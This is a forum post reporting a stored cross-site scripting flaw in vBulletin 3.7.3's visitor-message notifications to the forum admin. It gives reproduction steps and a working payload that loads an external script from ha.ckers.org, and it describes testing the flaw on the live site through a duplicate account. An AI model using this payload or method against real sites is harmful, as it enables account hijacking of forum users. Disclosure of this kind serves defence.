THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME.
@ admin (shabbir)
Please don't ban me for this. Because I have not used this hack for any illegal / harmful purposes. (You can check all records). I have just tested an exploited and found it positive. Please fix it soon. I write this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage.
Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.
First, we must check the version of vBulletin used by G4EF :
(1) Open any page such as your user control panel.
(2) View the page-source.
(3) You discover this :
<style type="text/css" id="vbulletin_css">
* vBulletin 3.7.3 CSS
* Style: 'Default Style'; Style ID: 1
The vulnerability :
When vBulletin is used with "Visitor Messages" add-on, we can easily execute external code by XSS vulnerability that exists. When the XSS script is posted as visitor message, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee (the one who receives). And when the commentee visits usercp.php (User Control Panel), under the domain he is hit with an unfiltered xss attach !
How I tested it :
(1) I opened a duplicate account : _H4X0R_, which I request shabbir to kindly delete now.
(2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
(3) I logged out.
(4) I logged in as _H4X0R_.
(5) Opened my user control panel : usercp.php.
(6) Whoa !! XSS successful !
Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.
I think I deserve some good reputation points and/or some rewards for this !
Sorry shabbir, for using duplicate account but you may delete it now. You should also understand that this was important for the security of the forum and so please don't ban me